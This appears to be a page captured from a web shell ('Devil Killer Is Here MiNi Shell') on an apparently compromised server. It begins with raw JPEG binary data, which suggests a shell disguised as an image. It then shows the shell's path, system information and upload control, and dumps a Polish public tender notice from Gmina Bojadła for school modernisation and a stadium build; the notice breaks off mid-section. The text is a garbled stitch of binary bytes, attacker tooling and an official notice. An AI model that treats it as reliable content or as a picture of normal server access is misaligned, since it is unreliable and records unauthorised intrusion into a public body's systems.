JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240614/0036767301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> MODERNIZACJA SZKOŁY PODSTAWOWEJ W BOJADŁACH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BOJADŁA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sulechowska 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bojadła</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@bojadla.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bojadla.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> MODERNIZACJA SZKOŁY PODSTAWOWEJ W BOJADŁACH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9f3dac5d-2a3f-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00367673</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9f3dac5d-2a3f-11ef-b373-0e435a8a43bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim.<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, wszelkich<br/>oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się przy użyciu Platformy ezamówienia, zwanej dalej Platformą, która<br/>jest dostępna pod adresem<br/>https://ezamowienia.gov.pl. Zamawiający dopuszcza również komunikację za pomocą<br/>poczty elektronicznej pod adresem zamowienia@bojadla.pl jednakże ta forma komunikacji nie dotyczy składania ofert.<br/>3. Korzystanie z Platformy jest bezpłatne.<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga<br/>posiadania konta na Platformie ani logowania.<br/>5. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie. Szczegółowe<br/>informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania<br/>z Platformy określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce<br/>„Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do<br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań. Formularze do komunikacji umożliwiają również dołączenie załącznika<br/>do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Szczegółowy opis wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej jest w rozdziale XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarza- niem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz.U.UE.L. z 2016r. Nr 119, s.1 ze zm.) - dalej: „RODO”<br/>informuję, że:<br/>1. Administratorem Państwa danych jest Wójt Gminy Bojadła, ul. Sulechowska 35, 66-130 Bojadła, tel.: 68 3523332.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach<br/>dotyczących przetwarzania danych osobowych za pośrednictwem adresu email: inspektor@cbi24.pl lub pisemnie na adres<br/>Administratora.<br/>3. Państwa dane osobowe będą przetwarzane w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego<br/>jak również w celu realizacji praw oraz obowiązków wynikających z przepisów prawa (art. 6 ust. 1 lit. c RODO) oraz ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 poz. 1720 z późn. zm.),<br/>4. Państwa dane osobowe będą przetwarzane przez okres niezbędny do realizacji ww. celu z uwzględnieniem okresów<br/>przechowywania określonych w przepisach szczególnych, w tym przepisów archiwalnych.<br/>5. Państwa dane nie będą przetwarzane w sposób zautomatyzowany, w tym nie będą podlegać profilowaniu.<br/>6. Państwa dane osobowe nie będą przekazywane poza Europejski Obszar Gospodarczy (obejmujący Unię Europejską, Norwegię,<br/>Liechtenstein i Islandię).<br/>7. W związku z przetwarzaniem Państwa danych osobowych, przysługują Państwu następujące prawa:<br/>1) prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>2) prawo do sprostowania (poprawiania) swoich danych osobowych;<br/>3) prawo do ograniczenia przetwarzania danych osobowych;<br/>4) prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), w sytuacji, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych (RODO);<br/>a) podanie przez Państwa danych osobowych jest obowiązkowe. Nieprzekazanie danych skutkować będzie brakiem realizacji celu, o<br/>którym mowa w punkcie 3.<br/>b) Państwa dane mogą zostać przekazane podmiotom zewnętrznym na podstawie umowy powierzenia przetwarzania danych<br/>osobowych, a także podmiotom lub organom uprawnionym na podstawie przepisów prawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.271.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach wykonania prac jest przebudowa budynku Zespołu Edukacyjnego w Bojadłach oraz rozbudowa placu zabaw, przebudowa instalacji sanitarnych, budowa instalacji oświetleniowej oraz przebudowa utwardzenia placu. <br/>Przebudowa budynku szkoły polega na poszerzeniu oraz zamurowaniu otworów drzwiowych, remoncie pomieszczeń takich jak m.in.: <br/>- biblioteka, <br/>- stołówka, <br/>- zaplecze kuchenne, <br/>- węzły sanitarne,<br/>- zaplecze sanitarno-szatniowe przy sali gimnastycznej.<br/>Charakterystyczne parametry techniczne stanu istniejącego:<br/>- max gabaryty w rzucie 39,7x48,04 [m],<br/>- powierzchnia zabudowy: 1100,98m2,<br/>- powierzchnia wewnętrzna wszystkich kondygnacji: 1613,58m2,<br/>- kubatura brutto: 8746,63m3,<br/>- wysokość budynku mierzona od poziomu terenu przy najniżej położonym wejściu do budynku,<br/>do kalenicy 112,93m,<br/>- wysokość pomieszczeń piwnicy: 1,95-2,43m,<br/>- wysokość pomieszczeń parteru: 2,54-6,82m,<br/>- wysokość pomieszczeń piętra: 2,64-3,63m,<br/>- wysokość pomieszczeń poddasza: 1,12-4,28m,<br/>- poziom „0” 58,47 m n.p.m.<br/><br/>W ramach zamówienia publicznego jest również do zrealizowania budowa nowego stadionu miejskiego wraz z zapleczem szatniowo-sanitarnym oraz pozostałą infrastrukturą towarzyszącą. Całe zamierzenie budowlane<br/>obejmuje obiektów i urządzeń budowalnych w następującym zakresie:<br/>- budynek zaplecza szatniowo-sanitarnego wraz z trybuną i zadaszeniem dla kibiców,<br/>- budynek spikera,<br/>- trawiasta płyta boiska o wymiarach 68x105[m] z wybiegami,<br/>- czterotorowa 400m bieżnia okólna, wraz z odwodnieniem liniowym,<br/>- sześciotorowa 100m bieżnia prosta,<br/>- system nawadniania boiska:<br/>- zraszacze sektorowe i pełno obrotowe,<br/>- instalacja kanalizacji wody deszczowej,<br/>- zbiornik buforowy wody opadowej o pojemności ok.80m3,<br/>- zestaw pompowy wody opadowej,<br/>- instalacja wodna do napełniania zbiornika,<br/>- przyłącze awaryjne wód opadowych,<br/>- montaż urządzeń boiskowych:<br/>- linie boiskowe,<br/>- bramki,<br/>- piłkochwyty,<br/>- bariera ochronna,<br/>- tablica wyników,<br/>- stanowiska do rozgrywek zawodów lekkoatletycznych:<br/>- skocznia skoku w dal,<br/>- skocznia skoku wzwyż,<br/>- rzutnia do pchnięcia kulą<br/>- oświetlenie treningowe na czterech masztach:<br/>- wraz z montażem instancji monitoringu,<br/>- wraz z montażem instancji nagłośnienia,<br/>- ciągi instalacji elektrycznych i niskoprądowych<br/>- rezerwowe ciągi rur osłonowych<br/>- wykonanie utwardzonych dojść i dojazdów,<br/>- wykonanie utwardzeń pod osłony dla zawodników rezerwowych i kontener spikera,<br/>- budowa ogrodzeń,<br/>- wykonanie instalacji elektroenergetycznej zasilania obiektu,<br/>- wykonie instalacji oświetlenia terenu,<br/>- wykonie instalacji zalicznikowych instalacji wodociągowych,<br/>- wykonanie instalacji i przyłącza kanalizacji sanitarnej,<br/>- wykonanie lokalnej przepompowni ścieków,<br/>- ułożenie zapasowych rur osłonowych pod płyta boiska,<br/>- wykonie przyłącza wody wraz ze studnią wodomierzową,<br/>- zagospodarowanie trenu wokoło boiska,<br/><br/>Szczegółowy opis przedmiotu zamówienia zawiera projekt wykonawczy, przedmiar robót i specyfikacja techniczna wykonania i odbioru robót budowlanych, projekt techniczno-wykonawczy stanowiący Załącznik nr 4 do Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45431200-9 - Kładzenie glazury</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45233124-4 - Roboty budowlane w zakresie arterii drogowych</p> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku. Zamówienie zostanie udzielone wykonawcy, który spełni<br/>wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryteriach oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji ponad wymagane 60 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym Zamawiający nie stawia żadnego warunku w tym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/> Zamawiający nie stawia żadnego warunku w tym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej <br/> Na potwierdzenie spełniania warunku Wykonawca ubiegający się o udzielenie zamówienia przedstawi informację z banku lub spółdzielczej kasy oszczędnościowo – kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem, w wysokości nie mniejszej niż: - 800 000,00 zł (słownie: osiemset tysięcy złotych) <br/>4) zdolności technicznej lub zawodowej: <br/> Na potwierdzenie spełniania warunku Wykonawca ubiegający się o udzielenie zamówienia wykaże, że: <br/>a)	zrealizował w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum 2 roboty polegające na budowie, przebudowie, rozbudowie lub remoncie budynku, każda o wartości nie mniejszej niż 500 000,00 zł brutto, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>UWAGA: <br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykluczone jest łączenie ich potencjałów w zakresie doświadczenia w wykonaniu robót budowlanych. Zamawiający uzna warunek dot. zdolności technicznej i zawodowej określony w pkt a. za spełniony przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia jeśli co najmniej jeden Wykonawca wykonał z należytą starannością minimum 2 roboty polegające na budowie, przebudowie, rozbudowie lub remoncie budynku, każda o wartości nie mniejszej niż 500 000,00 zł brutto, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/><br/>b)	<br/>- dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń <br/>- dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą uprawnienia do kierowania robotami w specjalności elektrycznej.<br/>- dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą uprawnienia do kierowania robotami w specjalności branży sanitarnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, składanych na wezwanie zamawiającego, w celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu (zał. nr 5 SWZ oraz zał. nr 6 SWZ): <br/>a)	WYKAZ ROBÓT BUDOWLANYCH wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – minimum 2 roboty polegające na budowie, przebudowie, rozbudowie lub remoncie budynku, każda o wartości nie mniejszej niż 500 000,00 zł brutto.<br/><br/>UWAGA: <br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykluczone jest łączenie ich potencjałów w zakresie doświadczenia w wykonaniu robót budowlanych. Zamawiający uzna warunek dot. zdolności technicznej i zawodowej określony w pkt a. za spełniony przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia jeśli co najmniej jeden Wykonawca wykonał z należytą starannością minimum 2 roboty polegające na budowie, przebudowie, rozbudowie lub remoncie budynku, każda o wartości nie mniejszej niż 500 000,00 zł brutto<br/> <br/>b) WYKAZ OSÓB którymi dysponuje Wykonawca: <br/>- dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń <br/>- dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą uprawnienia do kierowania robotami w specjalności elektrycznej.<br/>- dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą uprawnienia do kierowania robotami w specjalności branży sanitarnej.<br/> (W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument powinien potwierdzać spełnienie warunków przynajmniej przez jednego ze współpartnerów) <br/><br/>c) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które należy złożyć wraz z ofertą (elektronicznie):<br/>1) Uproszczony kosztorys ofertowy,<br/> 2) Oświadczenie, o którym mowa z art. 125 ust. 1 ustawy PZP, o niepodleganiu wykluczeniu,<br/> spełnianiu warunków udziału w postępowaniu na dzień składania ofert – załącznik nr 2 do SWZ;<br/> 3) W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:<br/> a) oświadczenia, o których mowa w rozdziale XVI, pkt 15, ppkt 2) i 4) SWZ,<br/> b) pełnomocnictwo, o którym mowa w rozdziale XVI, pkt 15, ppkt 1) SWZ;<br/> 4) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/> a) zobowiązanie podmiotu udostępniającego zasoby, (załącznik nr 7 SWZ) o którym mowa w rozdziale X pkt 2,<br/> ppkt 2.3 SWZ,<br/> b) oświadczenie, o którym mowa w rozdziale X pkt 2 ppkt 2.5 SWZ;<br/>9. Pełnomocnictwo 